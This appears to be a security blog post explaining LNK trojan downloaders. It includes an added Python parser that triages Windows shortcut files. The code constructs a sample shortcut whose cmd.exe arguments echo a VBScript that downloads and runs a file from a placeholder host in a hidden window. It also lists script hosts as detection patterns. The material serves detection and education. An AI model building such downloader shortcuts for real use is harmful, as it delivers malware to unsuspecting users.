LNK Trojan Downloaders – when the shortcut becomes the program

Malware authors have recently revived a cunning tactic to get their malicious code onto your machine — using a Windows Shortcut file both as the attack vector and the downloading payload itself.

The use of Windows Shortcuts is nothing new for malware. Malware authors will often drop a .LNK to point to their malicious executable (e.g. Troj/Dialer-DM). But these shortcuts are still being used in their proper fashion — serving as pointers to start up some other application, where the real functionality exists.

But the LNK Trojan Downloaders I’m talking about are not your typical shortcuts. In this case, the malicious shortcut is the downloader itself; no other malware needs to be present on the system for the first stage to work. The shortcut’s target is a standard Windows program, cmd.exe, and its command-line arguments are a series of echo commands that write a script to disk and then run it. That script downloads and executes more malware. Quite innovative.
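To make the mechanism concrete, here is an added example (my own code, not from the original post and not a sample of Troj/DownLnk): a small Python parser for the Shell Link binary format (MS-SHLLINK) that pulls out the target path, the command-line arguments and the ShowCommand value, then applies the triage rules the post implies. The shortcut it analyses is constructed in build_lnk() in the style described, cmd.exe with echo lines writing a VBScript and wscript running it; the hostname in it is a placeholder. The ShowCommand check is an extra heuristic the post does not mention (the minimised-window value is a documented field of the format). Real shortcuts usually also carry an ID list and a LinkInfo block before the strings; the parser skips those and reads LocalBasePath from LinkInfo when it is present.

```python
"""Parse a Windows .LNK (MS-SHLLINK) file and flag shortcuts whose target is a
script host and whose arguments use echo to build a script.  Added example; the
sample shortcut is constructed in build_lnk(), not a real Troj/DownLnk file."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits 0..7, in MS-SHLLINK order
(HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR,
 HAS_ARGS, HAS_ICON, IS_UNICODE) = (1 << i for i in range(8))
# StringData items appear in this fixed order, each as uint16 char count + chars
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
                 ("working_dir", HAS_WORK_DIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON))
SW_SHOWMINNOACTIVE = 7
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def build_lnk(relative_path, arguments, show_command=1):
    """Construct a minimal Unicode shortcut: 0x4C-byte header + StringData, no IDList/LinkInfo."""
    flags = HAS_REL_PATH | IS_UNICODE | (HAS_ARGS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20,               # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,            # creation / access / write FILETIMEs
                         0, 0,               # FileSize, IconIndex
                         show_command,       # ShowCommand (7 = minimised, no focus)
                         0, 0, 0, 0)         # HotKey, Reserved1-3
    body = b""
    for s in ((relative_path, arguments) if arguments else (relative_path,)):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return the header field and StringData items a triage analyst cares about."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_ID_LIST:                       # LinkTargetIDList: uint16 size + item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfo: uint32 total size comes first
        li_size, _hdr_size, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 1:                          # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            end = data.index(b"\x00", pos + base_off)
            info["local_base_path"] = data[pos + base_off:end].decode("cp1252", "replace")
        pos += li_size
    for key, bit in STRING_FIELDS:
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                info[key] = data[pos:pos + 2 * n].decode("utf-16-le")
                pos += 2 * n
            else:
                info[key] = data[pos:pos + n].decode("cp1252", "replace")
                pos += n
    return info


def triage_lnk(data):
    """Return (parsed fields, list of reasons); an empty list means nothing suspicious."""
    info = parse_lnk(data)
    target = info.get("local_base_path") or info.get("relative_path") or ""
    exe = re.split(r"[\\/]", target)[-1].lower()
    args = info.get("arguments", "")
    low = args.lower()
    reasons = []
    if exe in SCRIPT_HOSTS:
        reasons.append(f"target is a script host ({exe}), not an application")
    if "echo" in low and ">" in low:
        reasons.append("echo output is redirected to a file: the shortcut writes a script")
    if re.search(r"\b(wscript|cscript|start|powershell|mshta)\b", low):
        reasons.append("arguments launch a second interpreter to run what was written")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand is SW_SHOWMINNOACTIVE: console window kept out of sight")
    return info, reasons


# Constructed sample in the style the post describes (placeholder host, .invalid TLD).
SAMPLE_ARGS = ('/c echo Set x=CreateObject("MSXML2.XMLHTTP")>"%TEMP%\\u.vbs" & '
               'echo x.Open "GET","http://example.invalid/a.exe",0>>"%TEMP%\\u.vbs" & '
               'wscript "%TEMP%\\u.vbs"')
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe", SAMPLE_ARGS, SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    fields, verdict = triage_lnk(SAMPLE_LNK)
    print("target :", fields.get("relative_path"))
    print("args   :", fields.get("arguments"))
    for reason in verdict:
        print("FLAG   :", reason)
```

Run it as-is to see the constructed sample flagged on all four rules, or replace SAMPLE_LNK with the bytes of a real shortcut (open(path, "rb").read()). A benign shortcut to an application with no arguments produces an empty list, which is the point: the target being a script host plus echo redirection in the arguments is what separates a downloader from an ordinary pointer.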

Shortcut-based malware appeared way back in January of 2005 with W32/Acespade-A — a shortcut file overwriting virus that searches for .lnk files and replaces them with a copy of itself. It seems malware authors have rediscovered this mechanism to do more than just trash your shortcuts.

So don’t be tricked into opening a shortcut file from an untrusted source on the assumption that a LNK must be harmless because it can only point to items already on your system. cmd.exe is one of those items, and a shortcut can hand it whatever arguments its author likes. Fortunately, Sophos detects these threats as Troj/DownLnk-A, Troj/DownLnk-B and Mal/DownLnk-A.